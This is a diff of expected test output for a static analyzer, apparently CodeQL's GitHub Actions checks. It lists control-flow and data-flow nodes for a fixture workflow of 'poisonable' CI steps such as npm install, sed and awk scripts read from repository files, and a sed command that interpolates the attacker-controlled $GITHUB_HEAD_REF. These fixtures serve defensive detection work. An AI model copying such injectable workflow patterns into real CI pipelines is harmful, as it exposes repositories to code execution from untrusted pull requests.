.github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | | .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | -| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | -| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | | .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | -| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | -| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | | .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | -| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | -| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | | .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | -| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | -| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | | .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | -| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | -| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | | .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | -| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | -| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | | .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | -| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | -| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | | .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | -| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | -| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | | .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | -| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | -| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | | .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | -| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | -| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | | .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | -| .github/workflows/poisonable_steps.yml:29:9:29:43 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | -| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:29:9:29:43 | Run Step | +| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | +| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | +| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | +| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | +| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | +| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | +| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | +| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | +| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | +| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | +| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | +| .github/workflows/poisonable_steps.yml:40:9:40:74 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | .github/workflows/poisonable_steps.yml:40:9:40:74 | Run Step | | .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:5:1:8 | push | @@ -588,11 +665,11 @@ cfgNodes | .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/multiline.yml:85:9:89:29 | Run Step | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/poisonable_steps.yml:1:1:29:43 | enter on: push | -| .github/workflows/poisonable_steps.yml:1:1:29:43 | exit on: push | -| .github/workflows/poisonable_steps.yml:1:1:29:43 | exit on: push (normal) | -| .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | -| .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:1:1:40:74 | enter on: push | +| .github/workflows/poisonable_steps.yml:1:1:40:74 | exit on: push | +| .github/workflows/poisonable_steps.yml:1:1:40:74 | exit on: push (normal) | +| .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | | .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | | .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | | .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | @@ -629,8 +706,30 @@ cfgNodes | .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | | .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | | .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | -| .github/workflows/poisonable_steps.yml:29:9:29:43 | Run Step | +| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | | .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | +| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | +| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | +| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | +| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | +| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | +| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | +| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | +| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | +| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | +| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | +| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | +| .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | +| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | +| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | +| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | +| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | +| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | +| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | +| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | +| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | +| .github/workflows/poisonable_steps.yml:40:9:40:74 | Run Step | +| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | | .github/workflows/test.yml:1:1:40:53 | enter on: push | | .github/workflows/test.yml:1:1:40:53 | exit on: push | | .github/workflows/test.yml:1:1:40:53 | exit on: push (normal) | @@ -709,7 +808,7 @@ dfNodes | .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/multiline.yml:85:9:89:29 | Run Step | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | | .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | | .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | | .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | @@ -746,8 +845,30 @@ dfNodes | .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | | .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | | .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | -| .github/workflows/poisonable_steps.yml:29:9:29:43 | Run Step | +| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | | .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | +| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | +| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | +| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | +| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | +| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | +| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | +| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | +| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | +| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | +| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | +| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | +| .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | +| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | +| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | +| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | +| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | +| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | +| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | +| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | +| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | +| .github/workflows/poisonable_steps.yml:40:9:40:74 | Run Step | +| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:8:7:10:4 | Job outputs node | | .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | @@ -828,7 +949,7 @@ nodeLocations | .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:79:14:84:29 | .github/workflows/multiline.yml@79:14:84:29 | | .github/workflows/multiline.yml:85:9:89:29 | Run Step | .github/workflows/multiline.yml:85:9:89:29 | .github/workflows/multiline.yml@85:9:89:29 | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:86:14:89:29 | .github/workflows/multiline.yml@86:14:89:29 | -| .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | .github/workflows/poisonable_steps.yml:5:5:29:43 | .github/workflows/poisonable_steps.yml@5:5:29:43 | +| .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | .github/workflows/poisonable_steps.yml:5:5:40:74 | .github/workflows/poisonable_steps.yml@5:5:40:74 | | .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | .github/workflows/poisonable_steps.yml:7:9:8:6 | .github/workflows/poisonable_steps.yml@7:9:8:6 | | .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:7:14:7:30 | .github/workflows/poisonable_steps.yml@7:14:7:30 | | .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | .github/workflows/poisonable_steps.yml:8:9:13:6 | .github/workflows/poisonable_steps.yml@8:9:13:6 | @@ -865,8 +986,30 @@ nodeLocations | .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:27:14:27:76 | .github/workflows/poisonable_steps.yml@27:14:27:76 | | .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | .github/workflows/poisonable_steps.yml:28:9:29:6 | .github/workflows/poisonable_steps.yml@28:9:29:6 | | .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:28:14:28:92 | .github/workflows/poisonable_steps.yml@28:14:28:92 | -| .github/workflows/poisonable_steps.yml:29:9:29:43 | Run Step | .github/workflows/poisonable_steps.yml:29:9:29:43 | .github/workflows/poisonable_steps.yml@29:9:29:43 | +| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | .github/workflows/poisonable_steps.yml:29:9:30:6 | .github/workflows/poisonable_steps.yml@29:9:30:6 | | .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:29:14:29:42 | 